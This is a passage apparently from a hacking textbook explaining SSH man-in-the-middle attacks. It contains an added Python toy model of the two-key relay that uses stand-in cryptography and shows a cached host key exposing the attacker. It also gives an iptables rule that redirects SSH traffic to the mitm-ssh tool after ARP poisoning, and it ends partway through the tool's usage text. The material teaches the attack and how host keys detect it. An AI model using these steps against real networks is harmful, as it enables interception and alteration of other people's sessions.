This means that the attacker actually maintains two separate encrypted
channels with two separate session keys. Packets from A are encrypted with
the first key and sent to the attacker, which A believes is B. The attacker
decrypts them with the first key, re-encrypts them with the second key, and
sends the newly encrypted packets on to B, which believes they came directly
from A. By sitting in the middle and holding both keys, the attacker is able
to sniff and even modify the traffic between A and B without either side
being the wiser. The one thing that can give the attacker away is the host
key: the key that A is shown during the exchange belongs to the attacker,
not to B, so a client that already has B's key cached will warn that the
remote host identification has changed. Only a client that has never
connected to B before (or a user who ignores that warning) will complete
the connection.
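To make the two-channel relay concrete, here is a small Python model of it. This is an added example, not code from the book or from the mitm-ssh package. The SSH transport cipher and the key exchange are replaced by stand-ins (a toy keystream cipher built from SHA-256, and a session key derived from two nonces); neither is secure nor part of the real protocol, and the target address 192.168.42.72, the message, and the nonces are assumed. What it shows is that the attacker holds one key per channel, reads and alters the plaintext between them, and is caught only when the client compares the presented host key against one it has cached.

```python
import hashlib
import os


def toy_stream(key: bytes, data: bytes) -> bytes:
    """Stand-in for the negotiated transport cipher: XOR with a SHA-256
    counter keystream. Symmetric, so it both encrypts and decrypts. NOT secure."""
    stream = b""
    counter = 0
    while len(stream) < len(data):
        stream += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


def kex(client_nonce: bytes, server_nonce: bytes) -> bytes:
    """Stand-in for the SSH key exchange: both sides derive the same session
    key from the two exchanged nonces (real SSH uses Diffie-Hellman)."""
    return hashlib.sha256(client_nonce + server_nonce).digest()


def fingerprint(host_key: bytes) -> str:
    """Short fingerprint of a host key, as stored in known_hosts."""
    return hashlib.sha256(host_key).hexdigest()[:16]


class Server:
    """The real SSH server B. Its host key is what a careful client remembers."""
    def __init__(self):
        self.host_key = os.urandom(32)   # stands in for B's host key pair
        self.nonce = os.urandom(16)
        self.received = []               # plaintext B actually sees

    def accept(self, client_nonce: bytes) -> None:
        self.key = kex(client_nonce, self.nonce)

    def deliver(self, ciphertext: bytes) -> None:
        self.received.append(toy_stream(self.key, ciphertext))


class Client:
    """Client A. known_hosts maps host -> fingerprint, like ~/.ssh/known_hosts."""
    def __init__(self, known_hosts: dict):
        self.known_hosts = known_hosts

    def connect(self, host: str, presented_host_key: bytes, server_nonce: bytes):
        fp = fingerprint(presented_host_key)
        cached = self.known_hosts.get(host)
        if cached is not None and cached != fp:
            raise ConnectionError("REMOTE HOST IDENTIFICATION HAS CHANGED for " + host)
        self.known_hosts[host] = fp      # first contact: user accepted the unknown key
        nonce = os.urandom(16)
        return nonce, kex(nonce, server_nonce)


class MitmSsh:
    """Models the attacker: answers A as a server using its own host key,
    connects to B as a client, and keeps one session key per channel."""
    def __init__(self, real_server: Server, tamper=None):
        self.host_key = os.urandom(32)   # the attacker's key, not B's
        self.nonce = os.urandom(16)
        self.real = real_server
        self.tamper = tamper             # optional function that rewrites plaintext
        self.sniffed = []                # plaintext the attacker observed

    def accept(self, client_nonce: bytes) -> None:
        self.key_a = kex(client_nonce, self.nonce)     # channel 1: A <-> attacker
        my_nonce = os.urandom(16)
        self.real.accept(my_nonce)
        self.key_b = kex(my_nonce, self.real.nonce)    # channel 2: attacker <-> B

    def deliver(self, ciphertext: bytes) -> None:
        plain = toy_stream(self.key_a, ciphertext)     # decrypt with the first key
        self.sniffed.append(plain)
        if self.tamper is not None:
            plain = self.tamper(plain)
        self.real.deliver(toy_stream(self.key_b, plain))  # re-encrypt with the second key


def run_session(client: Client, server: Server, use_mitm: bool,
                message: bytes = b"ls -la /root\n", tamper=None):
    """A connects to 192.168.42.72 (assumed target); with use_mitm the ARP
    redirect has already steered the connection to the attacker instead."""
    front = MitmSsh(server, tamper) if use_mitm else server
    nonce, key = client.connect("192.168.42.72", front.host_key, front.nonce)
    front.accept(nonce)
    front.deliver(toy_stream(key, message))
    return front


if __name__ == "__main__":
    server = Server()
    victim = Client({})                  # never connected before: trust on first use
    mitm = run_session(victim, server, True, tamper=lambda p: p.replace(b"/root", b"/tmp"))
    print("attacker saw:", mitm.sniffed, "server got:", server.received)
    careful = Client({"192.168.42.72": fingerprint(server.host_key)})
    try:
        run_session(careful, server, True)
    except ConnectionError as e:
        print("cached host key caught the attacker:", e)
```

The first session succeeds because the victim has no cached key and accepts the attacker's; the second fails because the fingerprint the attacker presents does not match the one stored for 192.168.42.72, which is exactly the warning a real OpenSSH client prints in this situation.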
After redirecting traffic with an ARP cache poisoning tool, there are a
number of SSH man-in-the-middle attack tools that can be used. Most of
these are just modifications of the existing openssh source code. This can
all be done with the ARP redirection technique from "Active Sniffing" on
page 239 and a modified openssh package aptly called mitm-ssh. There are
other tools that do this; however, Claes Nyberg's mitm-ssh is publicly
available and the most robust, and it has been included on the LiveCD. The
source package is in /usr/src/mitm-ssh, and it has already been built and
installed.
When running, mitm-ssh accepts connections on a given port and then
proxies them to the real IP address of the target SSH server. With the
help of arpspoof to poison ARP caches, traffic for the target SSH server
can be redirected to the attacker's machine running mitm-ssh. Since
mitm-ssh listens on a port of its own rather than on port 22, some IP
filtering rules are needed to deliver the redirected traffic to it. Note
that the attacker's machine is now receiving all of A's traffic for the
target, so IP forwarding should be enabled as well, or A's other
connections to that host will simply be dropped.
In the example below, the target SSH server is at 192.168.42.72. When
mitm-ssh is run, it will listen on port 2222, so it doesn't need to be run
as root (only ports below 1024 require that). The iptables command tells
Linux to redirect all incoming TCP connections on port 22 to port 2222 on
the local machine, where mitm-ssh will be listening. The second command
lists the nat table so the rule can be checked.
reader@hacking:~ $ sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-ports 2222
reader@hacking:~ $ sudo iptables -t nat -L
Chain PREROUTING (policy ACCEPT)
target prot opt source destination
REDIRECT tcp -- anywhere anywhere tcp dpt:ssh redir ports 2222
Chain POSTROUTING (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
reader@hacking:~ $ mitm-ssh
..
/|\ SSH Man In The Middle [Based on OpenSSH_3.9p1]
_|_ By CMN <cmn@darklab.org>
Usage: mitm-ssh <non-nat-route> [option(s)]
Routes: